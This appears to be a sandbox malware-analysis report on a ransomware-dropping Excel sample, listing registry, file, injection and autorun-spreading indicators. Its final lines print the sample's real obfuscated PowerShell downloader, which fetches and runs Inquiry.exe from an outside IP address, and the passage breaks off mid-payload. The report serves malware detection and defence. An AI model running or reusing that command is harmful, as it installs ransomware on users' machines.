a1eb07454ea5adab102dea131a43042b47ab37320077a33c28988f40a7e23d4e

Analysis

max time kernel
150s
resource
win10v191014
submitted
21-01-2020 16:31

Sharing

Copy URL

Twitter E-mail

General

Target

a1eb07454ea5adab102dea131a43042b47ab37320077a33c28988f40a7e23d4e
Sample

200121-p3fehv18v6
SHA256

a1eb07454ea5adab102dea131a43042b47ab37320077a33c28988f40a7e23d4e

Score

10^/10

evasion trojan ransomware spreading

Malware Config

Signatures

NTFS ADS 2 IoCs

Processes:

Inquiry.exeInquiry.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Inqyuiry\Inquiry.exe:ZoneIdentifier	Inquiry.exe
File created	C:\bot.exe\:ZoneIdentifier:$DATA	Inquiry.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

EXCEL.EXEMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid process

4984 EXCEL.EXE
4804 MicrosoftEdge.exe
1844 MicrosoftEdgeCP.exe

pid	process
4984	EXCEL.EXE
4804	MicrosoftEdge.exe
1844	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

EXCEL.EXEpowershell.exeInquiry.exeInquiry.exeMicrosoftEdgeCP.exe

description	pid	process	target process
PID 4984 wrote to memory of 2032	4984	EXCEL.EXE	cmd.exe
PID 3800 wrote to memory of 4700	3800	powershell.exe	Inquiry.exe
PID 4700 wrote to memory of 4732	4700	Inquiry.exe	Inquiry.exe
PID 4732 wrote to memory of 4428	4732	Inquiry.exe	Inquiry.exe
PID 4732 wrote to memory of 4412	4732	Inquiry.exe	Inquiry.exe
PID 1844 wrote to memory of 2420	1844	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe

Executes dropped EXE 4 IoCs

Processes:

Inquiry.exeInquiry.exeInquiry.exeInquiry.exe

pid process

4700 Inquiry.exe
4732 Inquiry.exe
4428 Inquiry.exe
4412 Inquiry.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

Inquiry.exeMicrosoftEdgeCP.exe

pid process

4732 Inquiry.exe
1844 MicrosoftEdgeCP.exe

pid	process
4700	Inquiry.exe
4732	Inquiry.exe
4428	Inquiry.exe
4412	Inquiry.exe

pid	process
4732	Inquiry.exe
1844	MicrosoftEdgeCP.exe

Modifies registry class 233 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{5BAE3D7C-8BFC-439C-9113-B7A3E6A90253} = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000fff03219c7878e0f699fdd4470c43aee7711f41e6bf645ac84e30674304810232696bfc24c383f5ed7ad47597c7b5e6b4996c7811f23e42d5e96	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\google.com\Total = "6"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\google.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 106316d680d0d501	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\google.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "6"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "12"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies control panel 3 IoCs

evasion

Processes:

Inquiry.exeMicrosoftEdge.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Control Panel\Desktop\WallpaperStyle = "2"	Inquiry.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Control Panel\Desktop\TileWallpaper = "0"	Inquiry.exe
Key created	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Control Panel\Colors	MicrosoftEdge.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

Inquiry.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Documents\\Cyborg_DECRYPT.jpg"	Inquiry.exe

Drops file in Windows directory 1 IoCs

Processes:

MicrosoftEdge.exe

description ioc process

File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe
Drops autorun.inf file 1 TTPs 2 IoCs
spreading trojan

Replication Through Removable Media
T1091

Processes:

Inquiry.exe

description ioc process

File created C:\autorun.inf Inquiry.exe
File opened for modification C:\autorun.inf Inquiry.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

description	ioc	process
File created	C:\autorun.inf	Inquiry.exe
File opened for modification	C:\autorun.inf	Inquiry.exe

Process spawned unexpected child process 1 IoCs

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2032	4984	cmd.exe	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exeInquiry.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	pid	process
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeDebugPrivilege	4428	Inquiry.exe
Token: SeDebugPrivilege	4804	MicrosoftEdge.exe
Token: SeDebugPrivilege	2420	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4160	MicrosoftEdgeCP.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeInquiry.exeInquiry.exeInquiry.exe

pid process

3800 powershell.exe
4700 Inquiry.exe
4732 Inquiry.exe
4412 Inquiry.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Inquiry.exe

description pid process target process

PID 4732 set thread context of 4428 4732 Inquiry.exe Inquiry.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4984 EXCEL.EXE

pid	process
3800	powershell.exe
4700	Inquiry.exe
4732	Inquiry.exe
4412	Inquiry.exe

description	pid	process	target process
PID 4732 set thread context of 4428	4732	Inquiry.exe	Inquiry.exe

pid	process
4984	EXCEL.EXE

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MicrosoftEdge.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MicrosoftEdgeCP.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MicrosoftEdgeCP.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MicrosoftEdgeCP.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MicrosoftEdgeCP.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MicrosoftEdgeCP.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\a1eb07454ea5adab102dea131a43042b47ab37320077a33c28988f40a7e23d4e.xls
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
PID:4984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" & /c pOwersHEll -E ZgB1AG4AYwB0AGkAbwBuACAAcABXADkANAAyAEYAdABNAFoAaABLAGkAXwBIAFkAbQBrAFEAagA3AFEAOQBvAHEANAAgACgAIAAkAFcATwA5AHMARwB4AHEAYQBnAEIAXwAxAG4ASwBYAHQAXwBwAFcAXwAgACwAIAAkAHMAMgA4AHYARQBwAFYAbABuAGIAcAByAFAAXwBjADEAdQBkAFEAcwBjAEcAZwBFAFQAdgA2AEUASwAgACkADQAKAHsADQAKAA0ACgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoAA0ACgAkAFcATwA5AHMARwB4AHEAYQBnAEIAXwAxAG4ASwBYAHQAXwBwAFcAXwAgACwAIAAkAHMAMgA4AHYARQBwAFYAbABuAGIAcAByAFAAXwBjADEAdQBkAFEAcwBjAEcAZwBFAFQAdgA2AEUASwAgAA0ACgApAA0ACgA7AA0ACgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAcwAyADgAdgBFAHAAVgBsAG4AYgBwAHIAUABfAGMAMQB1AGQAUQBzAGMARwBnAEUAVAB2ADYARQBLACAAKQANAAoAOwANAAoADQAKAH0ADQAKAA0ACgB0AHIAeQB7AA0ACgANAAoADQAKAA0ACgANAAoADQAKAA0ACgANAAoADQAKACQAdQA4AGgAYwAyAHcAbwA3ADIAdgB1AGEAMQBXAEEAagBaAGIAZQBQAEMAcQBqADUAPQAkAGUAbgBWADoAdABFAE0AcAArACcAXABJAG4AcQB1AGkAcgB5AC4AZQB4AGUAJwA7AA0ACgBwAFcAOQA0ADIARgB0AE0AWgBoAEsAaQBfAEgAWQBtAGsAUQBqADcAUQA5AG8AcQA0ACAAJwBoAHQAdABwADoALwAvADEANQAxAC4AMQAwADYALgAyAC4AMQAwADMALwBJAG4AcQB1AGkAcgB5AC4AZQB4AGUAJwAgACQAdQA4AGgAYwAyAHcAbwA3ADIAdgB1AGEAMQBXAEE